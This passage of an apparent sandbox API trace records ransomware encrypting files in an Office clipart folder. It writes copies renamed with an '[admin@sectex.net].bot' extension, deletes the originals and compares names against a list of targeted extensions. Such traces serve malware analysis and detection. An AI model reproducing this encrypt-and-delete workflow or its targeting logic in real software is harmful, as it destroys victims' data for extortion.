	[0139.977] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.020] GetLastError () returned 0x0
	[0140.020] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x32b5, lpOverlapped=0x0) returned 1
	[0140.021] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x32c0, lpOverlapped=0x0) returned 1
	[0140.023] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.023] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.023] SetEndOfFile (hFile=0x31c) returned 1
	[0140.023] CloseHandle (hObject=0x31c) returned 1
	[0140.023] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.023] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.026] CloseHandle (hObject=0x3a4) returned 1
	[0140.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 1
	[0140.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.043] lstrlenW (lpString=".doc") returned 4
	[0140.043] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.043] lstrlenW (lpString=".docx") returned 5
	[0140.043] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.043] lstrlenW (lpString=".pdf") returned 4
	[0140.043] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.043] lstrlenW (lpString=".xls") returned 4
	[0140.043] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.043] lstrlenW (lpString=".xlsx") returned 5
	[0140.043] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.043] lstrlenW (lpString=".ppt") returned 4
	[0140.043] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.043] lstrlenW (lpString=".zip") returned 4
	[0140.043] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.043] lstrlenW (lpString=".rar") returned 4
	[0140.043] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.043] lstrlenW (lpString=".bz2") returned 4
	[0140.043] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.043] lstrlenW (lpString=".7z") returned 3
	[0140.043] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.043] lstrlenW (lpString=".dbf") returned 4
	[0140.043] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.043] lstrlenW (lpString=".1cd") returned 4
	[0140.044] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString=".jpg") returned 4
	[0140.044] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString=".doc") returned 4
	[0140.044] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString=".docx") returned 5
	[0140.044] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.044] lstrlenW (lpString=".pdf") returned 4
	[0140.044] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.044] lstrlenW (lpString=".xls") returned 4
	[0140.044] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.044] lstrlenW (lpString=".xlsx") returned 5
	[0140.044] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.044] lstrlenW (lpString=".ppt") returned 4
	[0140.044] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString=".zip") returned 4
	[0140.044] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.044] lstrlenW (lpString=".rar") returned 4
	[0140.044] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.044] lstrlenW (lpString=".bz2") returned 4
	[0140.044] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString=".7z") returned 3
	[0140.044] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString=".dbf") returned 4
	[0140.044] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.044] lstrlenW (lpString=".1cd") returned 4
	[0140.044] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 63
	[0140.045] lstrlenW (lpString=".jpg") returned 4
	[0140.045] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.045] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.045] lstrlenW (lpString="GRID_01.MID") returned 11
	[0140.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.045] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6331) returned 1
	[0140.045] CloseHandle (hObject=0x31c) returned 1
	[0140.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 0x20
	[0140.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.052] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.057] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.071] GetLastError () returned 0x0
	[0140.071] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x18bb, lpOverlapped=0x0) returned 1
	[0140.075] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x18c0, lpOverlapped=0x0) returned 1
	[0140.076] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.076] WriteFile (in: hFile=0x31c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0140.076] SetEndOfFile (hFile=0x31c) returned 1
	[0140.079] CloseHandle (hObject=0x31c) returned 1
	[0140.079] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.079] SetEndOfFile (hFile=0x384) returned 1
	[0140.304] CloseHandle (hObject=0x384) returned 1
	[0140.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grid_01.mid")) returned 1
	[0140.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.333] lstrlenW (lpString=".doc") returned 4
	[0140.333] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.333] lstrlenW (lpString=".docx") returned 5
	[0140.333] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.333] lstrlenW (lpString=".pdf") returned 4
	[0140.333] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.333] lstrlenW (lpString=".xls") returned 4
	[0140.333] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.333] lstrlenW (lpString=".xlsx") returned 5
	[0140.333] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.333] lstrlenW (lpString=".ppt") returned 4
	[0140.333] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.333] lstrlenW (lpString=".zip") returned 4
	[0140.333] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.333] lstrlenW (lpString=".rar") returned 4
	[0140.333] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.333] lstrlenW (lpString=".bz2") returned 4
	[0140.334] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString=".7z") returned 3
	[0140.334] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString=".dbf") returned 4
	[0140.334] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString=".1cd") returned 4
	[0140.334] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString=".jpg") returned 4
	[0140.334] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString=".doc") returned 4
	[0140.334] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString=".docx") returned 5
	[0140.334] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.334] lstrlenW (lpString=".pdf") returned 4
	[0140.334] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.334] lstrlenW (lpString=".xls") returned 4
	[0140.334] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.334] lstrlenW (lpString=".xlsx") returned 5
	[0140.334] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.334] lstrlenW (lpString=".ppt") returned 4
	[0140.334] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.334] lstrlenW (lpString=".zip") returned 4
	[0140.334] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.334] lstrlenW (lpString=".rar") returned 4
	[0140.334] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.334] lstrlenW (lpString=".bz2") returned 4
	[0140.334] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.334] lstrlenW (lpString=".7z") returned 3
	[0140.335] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.335] lstrlenW (lpString=".dbf") returned 4
	[0140.335] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.335] lstrlenW (lpString=".1cd") returned 4
	[0140.335] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 62
	[0140.335] lstrlenW (lpString=".jpg") returned 4
	[0140.335] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.335] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.335] lstrlenW (lpString="MUSIC_01.MID") returned 12
	[0140.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.362] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6880) returned 1
	[0140.362] CloseHandle (hObject=0x398) returned 1
	[0140.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 0x20
	[0140.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.368] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.368] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.368] GetLastError () returned 0x0
	[0140.368] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1ae0, lpOverlapped=0x0) returned 1
	[0140.370] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1af0, lpOverlapped=0x0) returned 1
	[0140.372] ReadFile (in: hFile=0x3a8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.372] WriteFile (in: hFile=0x38c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.372] SetEndOfFile (hFile=0x38c) returned 1
	[0140.372] CloseHandle (hObject=0x38c) returned 1
	[0140.372] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.373] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.375] CloseHandle (hObject=0x3a8) returned 1
	[0140.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 1
	[0140.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.375] lstrlenW (lpString=".doc") returned 4
	[0140.375] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.375] lstrlenW (lpString=".docx") returned 5
	[0140.375] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.376] lstrlenW (lpString=".pdf") returned 4
	[0140.376] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.376] lstrlenW (lpString=".xls") returned 4
	[0140.376] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.376] lstrlenW (lpString=".xlsx") returned 5
	[0140.376] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.376] lstrlenW (lpString=".ppt") returned 4
	[0140.376] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.376] lstrlenW (lpString=".zip") returned 4
	[0140.376] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.376] lstrlenW (lpString=".rar") returned 4
	[0140.376] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.376] lstrlenW (lpString=".bz2") returned 4
	[0140.376] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.376] lstrlenW (lpString=".7z") returned 3
	[0140.376] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.376] lstrlenW (lpString=".dbf") returned 4
	[0140.376] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.376] lstrlenW (lpString=".1cd") returned 4
	[0140.376] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.376] lstrlenW (lpString=".jpg") returned 4
	[0140.376] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString=".doc") returned 4
	[0140.377] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.377] lstrlenW (lpString=".docx") returned 5
	[0140.377] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.377] lstrlenW (lpString=".pdf") returned 4
	[0140.377] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.377] lstrlenW (lpString=".xls") returned 4
	[0140.377] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.377] lstrlenW (lpString=".xlsx") returned 5
	[0140.377] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.377] lstrlenW (lpString=".ppt") returned 4
	[0140.377] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString=".zip") returned 4
	[0140.377] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.377] lstrlenW (lpString=".rar") returned 4
	[0140.377] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.377] lstrlenW (lpString=".bz2") returned 4
	[0140.377] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.377] lstrlenW (lpString=".7z") returned 3
	[0140.377] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString=".dbf") returned 4
	[0140.377] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString=".1cd") returned 4
	[0140.377] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63
	[0140.377] lstrlenW (lpString=".jpg") returned 4
	[0140.377] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.378] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.378] lstrlenW (lpString="OCEAN_01.MID") returned 12
	[0140.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.379] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=5440) returned 1
	[0140.379] CloseHandle (hObject=0x3a8) returned 1
	[0140.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid")) returned 0x20
	[0140.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.379] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.379] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
